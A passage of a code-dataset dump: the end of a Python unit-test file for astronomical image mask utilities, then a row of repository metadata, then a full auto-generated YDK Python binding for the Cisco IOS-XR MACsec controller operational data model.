[True, True, True, True, True, True, True, True, True]]))).all()
def test__size__3x5__multiple_points(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 5))
assert (blurring_mask == np.rot90(np.array([[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, True, False, True, False, True, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, True, False, True, False, True, False, True],
[True, False, False, False, True, False, False, False, True],
[True, False, False, False, True, False, False, False,
True]]))).all()
def test__size__3x3__even_sized_image(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True],
[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True]])).all()
def test__size__5x5__even_sized_image(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
assert (blurring_mask == np.array([[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, False, False, False, False, False],
[True, True, True, False, False, False, False, False],
[True, True, True, False, False, True, False, False],
[True, True, True, False, False, False, False, False],
[True, True, True, False, False, False, False, False]])).all()
def test__size__3x3__rectangular_8x9_image(self):
mask = np.array([[True, True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True, True],
[True, True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False, True, True],
[False, True, False, True, False, True, False, True, True],
[False, False, False, True, False, False, False, True, True],
[True, True, True, True, True, True, True, True, True],
[False, False, False, True, False, False, False, True, True],
[False, True, False, True, False, True, False, True, True],
[False, False, False, True, False, False, False, True, True],
[True, True, True, True, True, True, True, True, True]])).all()
def test__size__3x3__rectangular_9x8_image(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, False, True, True, True, False, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])
blurring_mask = mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(3, 3))
assert (blurring_mask == np.array([[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True],
[False, False, False, True, False, False, False, True],
[False, True, False, True, False, True, False, True],
[False, False, False, True, False, False, False, True],
[True, True, True, True, True, True, True, True],
[True, True, True, True, True, True, True, True]])).all()
def test__size__5x5__multiple_points__mask_extends_beyond_edge_so_raises_mask_exception(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, True, True, True, False, True],
[True, True, True, True, True, True, True]])
with pytest.raises(exc.MaskException):
mask_util.mask_blurring_from_mask_and_psf_shape(mask, psf_shape=(5, 5))
class TestGridToMaskedPixel(object):
def test__setup_3x3_image_one_pixel(self):
mask = np.array([[True, True, True],
[True, False, True],
[True, True, True]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[1, 1]])).all()
def test__setup_3x3_image__five_pixels(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[0, 1],
[1, 0], [1, 1], [1, 2],
[2, 1]])).all()
def test__setup_3x4_image__six_pixels(self):
mask = np.array([[True, False, True, True],
[False, False, False, True],
[True, False, True, False]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[0, 1],
[1, 0], [1, 1], [1, 2],
[2, 1], [2, 3]])).all()
def test__setup_4x3_image__six_pixels(self):
mask = np.array([[True, False, True],
[False, False, False],
[True, False, True],
[True, True, False]])
grid_to_pixel = mask_util.masked_grid_1d_index_to_2d_pixel_index_from_mask(mask)
assert (grid_to_pixel == np.array([[0, 1],
[1, 0], [1, 1], [1, 2],
[2, 1],
[3, 2]])).all()
class TestEdgePixels(object):
def test__7x7_mask_one_central_pixel__is_entire_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0])).all()
def test__7x7_mask_nine_central_pixels__is_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 5, 6, 7, 8])).all()
def test__7x7_mask_rectangle_of_fifteen_central_pixels__is_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 5, 6, 8, 9, 11, 12, 13, 14])).all()
def test__8x7_mask_add_edge_pixels__also_in_edge(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, False, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, False, False, False, False, False, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12, 14, 15, 16, 17])).all()
def test__8x7_mask_big_square(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, False, False, False, False, False, True],
[True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 5, 9, 10, 14, 15, 19, 20, 24, 25, 26, 27, 28, 29])).all()
def test__7x8_mask_add_edge_pixels__also_in_edge(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, True, True, False, True, True, True, True],
[True, True, False, False, False, True, True, True],
[True, True, False, False, False, True, True, True],
[True, False, False, False, False, False, True, True],
[True, True, False, False, False, True, True, True],
[True, True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 6, 7, 8, 10, 11, 12, 13, 14])).all()
def test__7x8_mask_big_square(self):
mask = np.array([[True, True, True, True, True, True, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, False, False, False, False, False, True, True],
[True, True, True, True, True, True, True, True]])
edge_pixels = mask_util.edge_pixels_from_mask(mask)
assert (edge_pixels == np.array([0, 1, 2, 3, 4, 5, 9, 10, 14, 15, 19, 20, 21, 22, 23, 24])).all()
class TestBorderPixels(object):
def test__7x7_mask_one_central_pixel__border_is_central_pixel(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0])).all()
def test__7x7_mask_three_pixel__border_pixels_all_of_them_is_central_pixel(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, False, False, True, True, True, True],
[True, True, True, True, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2])).all()
def test__7x7_mask_nine_central_pixels__central_pixel_is_not_border_pixel(self):
mask = np.array([[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, False, False, False, True, True],
[True, True, True, True, True, True, True],
[True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
print(border_pixels)
assert (border_pixels == np.array([0, 1, 2, 3, 5, 6, 7, 8])).all()
def test__7x7_annulus_mask__inner_pixels_excluded(self):
mask = np.array([[False, False, False, False, False, False, False],
[False, True, True, True, True, True, False],
[False, True, False, False, False, True, False],
[False, True, False, True, False, True, False],
[False, True, False, False, False, True, False],
[False, True, True, True, True, True, False],
[False, False, False, False, False, False, False]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
def test__same_as_above_but_8x7_annulus_mask__true_values_at_top_or_bottom(self):
mask = np.array([[False, False, False, False, False, False, False],
[False, True, True, True, True, True, False],
[False, True, False, False, False, True, False],
[False, True, False, True, False, True, False],
[False, True, False, False, False, True, False],
[False, True, True, True, True, True, False],
[False, False, False, False, False, False, False],
[ True, True, True, True, True, True, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
mask = np.array([[ True, True, True, True, True, True, True],
[False, False, False, False, False, False, False],
[False, True, True, True, True, True, False],
[False, True, False, False, False, True, False],
[False, True, False, True, False, True, False],
[False, True, False, False, False, True, False],
[False, True, True, True, True, True, False],
[False, False, False, False, False, False, False]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
def test__same_as_above_but_7x8_annulus_mask__true_values_at_right_or_left(self):
mask = np.array([[False, False, False, False, False, False, False, True],
[False, True, True, True, True, True, False, True],
[False, True, False, False, False, True, False, True],
[False, True, False, True, False, True, False, True],
[False, True, False, False, False, True, False, True],
[False, True, True, True, True, True, False, True],
[False, False, False, False, False, False, False, True]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all()
mask = np.array([[True, False, False, False, False, False, False, False],
[True, False, True, True, True, True, True, False],
[True, False, True, False, False, False, True, False],
[True, False, True, False, True, False, True, False],
[True, False, True, False, False, False, True, False],
[True, False, True, True, True, True, True, False],
[True, False, False, False, False, False, False, False]])
border_pixels = mask_util.border_pixels_from_mask(mask)
assert (border_pixels == np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 13, 14, 17, 18, 22, 23, 24, 25,
26, 27, 28, 29, 30, 31])).all() | 58.568499 | 137 | 0.474949 | 7,871 | 71,395 | 4.058824 | 0.028205 | 0.447491 | 0.563058 | 0.64006 | 0.95527 | 0.944721 | 0.940464 | 0.936927 | 0.926503 | 0.916268 | 0 | 0.031178 | 0.411037 | 71,395 | 1,219 | 138 | 58.568499 | 0.728579 | 0 | 0 | 0.769147 | 0 | 0 | 0.000322 | 0.000322 | 0 | 0 | 0 | 0 | 0.115974 | 1 | 0.068928 | false | 0 | 0.006565 | 0 | 0.087527 | 0.001094 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
6ec763ded869c7082b26565a89231c258dc5c4a2 | 24,001 | py | Python | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_macsec_ctrlr_oper.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_macsec_ctrlr_oper.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_macsec_ctrlr_oper.py | tkamata-test/ydk-py | b637e7853a8edbbd31fbc05afa3aa4110b31c5f9 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | """ Cisco_IOS_XR_macsec_ctrlr_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR macsec\-ctrlr package operational data.
This module contains definitions
for the following management objects\:
macsec\-ctrlr\-oper\: Macsec controller data
Copyright (c) 2013\-2016 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class MacsecCtrlrCiphersuitEnum(Enum):
"""
MacsecCtrlrCiphersuitEnum
Macsec ctrlr ciphersuit
.. data:: gcm_aes_256 = 0
GCM AES 256
.. data:: gcm_aes_128 = 1
GCM AES 128
.. data:: gcm_aes_xpn_256 = 2
GCM AES XPN 256
"""
gcm_aes_256 = 0
gcm_aes_128 = 1
gcm_aes_xpn_256 = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrCiphersuitEnum']
class MacsecCtrlrStateEnum(Enum):
"""
MacsecCtrlrStateEnum
Macsec ctrlr state
.. data:: macsec_ctrlr_state_up = 0
Up
.. data:: macsec_ctrlr_state_down = 1
Down
.. data:: macsec_ctrlr_state_admin_down = 2
Administratively Down
"""
macsec_ctrlr_state_up = 0
macsec_ctrlr_state_down = 1
macsec_ctrlr_state_admin_down = 2
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrStateEnum']
class MacsecCtrlrOper(object):
"""
Macsec controller data
.. attribute:: macsec_ctrlr_ports
All Macsec Controller Port operational data
**type**\: :py:class:`MacsecCtrlrPorts <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.macsec_ctrlr_ports = MacsecCtrlrOper.MacsecCtrlrPorts()
self.macsec_ctrlr_ports.parent = self
class MacsecCtrlrPorts(object):
"""
All Macsec Controller Port operational data
.. attribute:: macsec_ctrlr_port
Controller name
**type**\: list of :py:class:`MacsecCtrlrPort <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.macsec_ctrlr_port = YList()
self.macsec_ctrlr_port.parent = self
self.macsec_ctrlr_port.name = 'macsec_ctrlr_port'
class MacsecCtrlrPort(object):
"""
Controller name
.. attribute:: name <key>
Port name
**type**\: str
**pattern:** (([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){3,4}\\d+\\.\\d+)\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]\*\\d+))\|(([a\-zA\-Z0\-9\_]\*\\d+/){2}([a\-zA\-Z0\-9\_]+))\|([a\-zA\-Z0\-9\_\-]\*\\d+)\|([a\-zA\-Z0\-9\_\-]\*\\d+\\.\\d+)\|(mpls)\|(dwdm)
.. attribute:: macsec_ctrlr_info
Macsec Controller operational data
**type**\: :py:class:`MacsecCtrlrInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.name = None
self.macsec_ctrlr_info = MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo()
self.macsec_ctrlr_info.parent = self
class MacsecCtrlrInfo(object):
"""
Macsec Controller operational data
.. attribute:: decrypt_sc_status
Decrypt Secure Channel Status
**type**\: :py:class:`DecryptScStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus>`
.. attribute:: encrypt_sc_status
Encrypt Secure Channel Status
**type**\: :py:class:`EncryptScStatus <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus>`
.. attribute:: must_secure
Must Secure
**type**\: bool
.. attribute:: replay_window_size
Replay Window Size
**type**\: int
**range:** 0..4294967295
.. attribute:: state
State
**type**\: :py:class:`MacsecCtrlrStateEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrStateEnum>`
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.decrypt_sc_status = MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus()
self.decrypt_sc_status.parent = self
self.encrypt_sc_status = MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus()
self.encrypt_sc_status.parent = self
self.must_secure = None
self.replay_window_size = None
self.state = None
class EncryptScStatus(object):
"""
Encrypt Secure Channel Status
.. attribute:: active_association
Active Associations
**type**\: list of :py:class:`ActiveAssociation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus.ActiveAssociation>`
.. attribute:: cipher_suite
Cipher Suite
**type**\: :py:class:`MacsecCtrlrCiphersuitEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrCiphersuitEnum>`
.. attribute:: confidentiality_offset
Confidentiality offset
**type**\: int
**range:** 0..4294967295
.. attribute:: max_packet_number
Max packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: protection_enabled
Protection Enabled
**type**\: bool
.. attribute:: recent_packet_number
Recent Packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: secure_channel_id
Secure Channel Id
**type**\: str
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.active_association = YList()
self.active_association.parent = self
self.active_association.name = 'active_association'
self.cipher_suite = None
self.confidentiality_offset = None
self.max_packet_number = None
self.protection_enabled = None
self.recent_packet_number = None
self.secure_channel_id = None
class ActiveAssociation(object):
"""
Active Associations
.. attribute:: association_number
Association Number
**type**\: int
**range:** 0..255
.. attribute:: short_secure_channel_id
Short secure channel id
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.association_number = None
self.short_secure_channel_id = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:active-association'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.association_number is not None:
return True
if self.short_secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus.ActiveAssociation']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:encrypt-sc-status'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.active_association is not None:
for child_ref in self.active_association:
if child_ref._has_data():
return True
if self.cipher_suite is not None:
return True
if self.confidentiality_offset is not None:
return True
if self.max_packet_number is not None:
return True
if self.protection_enabled is not None:
return True
if self.recent_packet_number is not None:
return True
if self.secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.EncryptScStatus']['meta_info']
class DecryptScStatus(object):
"""
Decrypt Secure Channel Status
.. attribute:: active_association
Active Associations
**type**\: list of :py:class:`ActiveAssociation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus.ActiveAssociation>`
.. attribute:: cipher_suite
Cipher Suite
**type**\: :py:class:`MacsecCtrlrCiphersuitEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_macsec_ctrlr_oper.MacsecCtrlrCiphersuitEnum>`
.. attribute:: confidentiality_offset
Confidentiality offset
**type**\: int
**range:** 0..4294967295
.. attribute:: max_packet_number
Max packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: protection_enabled
Protection Enabled
**type**\: bool
.. attribute:: recent_packet_number
Recent Packet Number
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: secure_channel_id
Secure Channel Id
**type**\: str
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.active_association = YList()
self.active_association.parent = self
self.active_association.name = 'active_association'
self.cipher_suite = None
self.confidentiality_offset = None
self.max_packet_number = None
self.protection_enabled = None
self.recent_packet_number = None
self.secure_channel_id = None
class ActiveAssociation(object):
"""
Active Associations
.. attribute:: association_number
Association Number
**type**\: int
**range:** 0..255
.. attribute:: short_secure_channel_id
Short secure channel id
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'macsec-ctrlr-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.association_number = None
self.short_secure_channel_id = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:active-association'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.association_number is not None:
return True
if self.short_secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus.ActiveAssociation']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:decrypt-sc-status'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.active_association is not None:
for child_ref in self.active_association:
if child_ref._has_data():
return True
if self.cipher_suite is not None:
return True
if self.confidentiality_offset is not None:
return True
if self.max_packet_number is not None:
return True
if self.protection_enabled is not None:
return True
if self.recent_packet_number is not None:
return True
if self.secure_channel_id is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo.DecryptScStatus']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-info'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.decrypt_sc_status is not None and self.decrypt_sc_status._has_data():
return True
if self.encrypt_sc_status is not None and self.encrypt_sc_status._has_data():
return True
if self.must_secure is not None:
return True
if self.replay_window_size is not None:
return True
if self.state is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort.MacsecCtrlrInfo']['meta_info']
@property
def _common_path(self):
if self.name is None:
raise YPYModelError('Key property name is None')
return '/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-oper/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-ports/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-port[Cisco-IOS-XR-macsec-ctrlr-oper:name = ' + str(self.name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.name is not None:
return True
if self.macsec_ctrlr_info is not None and self.macsec_ctrlr_info._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts.MacsecCtrlrPort']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-oper/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-ports'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.macsec_ctrlr_port is not None:
for child_ref in self.macsec_ctrlr_port:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper.MacsecCtrlrPorts']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-macsec-ctrlr-oper:macsec-ctrlr-oper'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.macsec_ctrlr_ports is not None and self.macsec_ctrlr_ports._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_macsec_ctrlr_oper as meta
return meta._meta_table['MacsecCtrlrOper']['meta_info']
